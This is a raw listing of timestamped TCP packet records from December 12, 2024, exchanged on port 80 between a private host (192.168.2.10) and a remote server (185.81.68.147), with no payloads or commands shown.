                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.632512093 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.632586002 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.632770061 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.632937908 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.633172989 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.633286953 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.633924961 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.634052038 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.634306908 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.634978056 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.635827065 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.636019945 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.636034012 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.636132002 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.636997938 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.638091087 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.638102055 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.638113976 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.638222933 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.639060020 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.639169931 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.639277935 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.640032053 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.640218019 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.640494108 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.641105890 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.641113043 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.641463041 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.642076969 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.642404079 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.642513990 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.643126011 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.643481016 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.643764973 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.644201040 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.644465923 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.644617081 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.645168066 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.645423889 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.645620108 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.646181107 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.646640062 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.646778107 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.647214890 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.647222042 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.647331953 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.648354053 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.648627996 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.648813009 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.649264097 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.649270058 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.649373055 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.650185108 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.650299072 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.650437117 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.651194096 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.651541948 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.651720047 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.652204990 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.652363062 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.652510881 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.653220892 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.653958082 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.654275894 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.654280901 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.654280901 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.654329062 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.655394077 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.655756950 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.655956984 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.656260014 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.656691074 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.657291889 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.657392025 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.657475948 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.658292055 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.658413887 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.658900023 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.659419060 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.659545898 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.660123110 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.660479069 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.660603046 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.660774946 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.661344051 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.661364079 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.661601067 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.661936045 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.662369967 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.662550926 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.662659883 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.663496971 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.663502932 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.663614035 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.664441109 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.664623022 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.665066957 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.665401936 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.665740013 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.665837049 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.666459084 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.666476011 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.666532040 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.667424917 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.667927027 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.668723106 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.668795109 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.668896914 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.669462919 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.669543028 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.669640064 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.670492887 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.670623064 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.670789003 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.671524048 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.671921015 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.672511101 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.672635078 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.672663927 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.672688007 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.673804045 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.673906088 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.674009085 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.674556017 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.674788952 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.674886942 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.675596952 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.675606966 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.675708055 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.676599979 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.677510977 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.677634001 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.677647114 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.677741051 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.678674936 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.678817034 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.678925991 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.679657936 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.679749966 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.679879904 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.680636883 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.681668043 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.681678057 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.681696892 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.681777954 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.681799889 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.682713985 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.682789087 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.682909966 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.683693886 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.683932066 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.684217930 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.684708118 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.685518026 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.685630083 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.685931921 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.728555918 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.824965000 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.825037003 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.825184107 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.825349092 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.825361013 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.825404882 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.826364040 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.826719046 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.826833963 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.826880932 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.827852964 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.827864885 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.827912092 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.828761101 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.828772068 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.828810930 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.829746962 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.830318928 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.830368042 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.830841064 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.830940962 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.830986977 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.831859112 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.831871033 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.831911087 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.832776070 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.832817078 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.833823919 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.833836079 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.833848000 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.833900928 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.834815979 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.835654974 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.835676908 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.835911989 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.835923910 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.835964918 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.836884022 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.837080002 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.837125063 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.837886095 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.837898970 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.837946892 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.838893890 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.838970900 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.839020967 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.839912891 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.839984894 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.839993954 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.840898991 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.840941906 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.840970039 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.841979980 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.842031002 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.843022108 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.843034029 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.843044996 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.843086004 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.844005108 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.844063044 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.844309092 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.844979048 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.845052958 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.845077991 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.845969915 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.846998930 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.847003937 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.847014904 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.847131968 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.848289967 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.848344088 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.848449945 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.849041939 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.849085093 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.850064993 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.850076914 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.850089073 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.850126028 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.851032019 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.851083040 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.851130962 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.852041006 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.852421999 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.852472067 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.853092909 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.853104115 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.853142023 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.854120970 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.854185104 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.854710102 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.855123043 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.855138063 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.855240107 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.856127024 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.856142998 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.856236935 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.857290983 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.857379913 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.857484102 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.858185053 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.858285904 CET8049946185.81.68.147192.168.2.10
